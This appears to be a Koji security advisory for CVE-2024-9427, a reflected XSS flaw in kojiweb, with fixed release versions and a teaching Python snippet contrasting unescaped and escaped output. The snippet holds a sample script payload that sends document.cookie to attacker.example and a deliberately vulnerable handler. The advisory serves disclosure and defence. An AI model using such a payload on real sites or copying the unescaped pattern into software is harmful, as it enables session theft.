CVE-2024-9427

New XSS attack on kojiweb

Summary

An unsanitized input in kojiweb allows a reflected cross-site scripting (XSS) attack: JavaScript supplied in a crafted link is echoed into the resulting web page without escaping and runs in the browser of any user who follows that link, with that user's session. At present we do not believe this can be used to submit an action or make a change in Koji, because of existing XSS protections in the code. Even so, this is a serious issue and we recommend applying this update promptly.
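The following Python example is added here to show the bug class in miniature; it is not Koji's code. A handler interpolates a query parameter straight into HTML (the vulnerable pattern) next to the same handler with HTML escaping applied. The parameter name `terms`, the page markup and the sample query string are constructed for illustration and do not correspond to the affected kojiweb endpoint.

```python
"""Reflected XSS: unescaped vs. escaped rendering of a query parameter.

Illustrative only; the endpoint, parameter and markup are invented and
are not the affected kojiweb code.
"""
import html
from urllib.parse import parse_qs

# Constructed sample: the query string an attacker might plant in a link.
# The value is never stored server-side; it is reflected on this one response.
MALICIOUS_QUERY = (
    'terms=<script>document.location='
    '"https://attacker.example/?c="%2Bdocument.cookie</script>'
)


def extract_terms(query_string: str) -> str:
    """Pull the 'terms' parameter out of a raw query string (hypothetical name)."""
    params = parse_qs(query_string, keep_blank_values=True)
    return params.get("terms", [""])[0]


def render_vulnerable(query_string: str) -> str:
    """Echo the parameter into the page as-is: attacker markup becomes page markup."""
    terms = extract_terms(query_string)
    return f"<html><body><p>Search results for: {terms}</p></body></html>"


def render_fixed(query_string: str) -> str:
    """Same page, but the attacker-controlled value is HTML-escaped before
    interpolation, so '<', '>', '&' and quotes are rendered as text, not markup."""
    terms = extract_terms(query_string)
    return (
        "<html><body><p>Search results for: "
        f"{html.escape(terms, quote=True)}</p></body></html>"
    )


def contains_script_tag(page: str) -> bool:
    """Crude comparison check: does a raw <script> element survive in the output?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(MALICIOUS_QUERY))
    print("fixed:     ", render_fixed(MALICIOUS_QUERY))
```

`html.escape` is the right tool only for text and attribute contexts; a value placed inside a `<script>` block, a URL or an event-handler attribute needs context-specific encoding, and the durable fix in a web application is a template engine with autoescaping on by default so that every interpolation is escaped unless explicitly marked safe.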

Bug fix

We are releasing updates for the affected Koji versions released within the past year. The following releases all contain the fix:

  • 1.35.1

  • 1.34.3

  • 1.33.2

Anyone running a Koji release older than those listed (older than 1.33) should update to a current release as soon as possible; no update is being issued for those older branches.

If you carry local modifications to the Koji code, we recommend rebasing your changes onto the appropriate update release rather than backporting the fix by hand. See Koji issue #4204 for the code details.

As with all changes to kojiweb code, you must restart httpd after installing the update for the changes to take effect.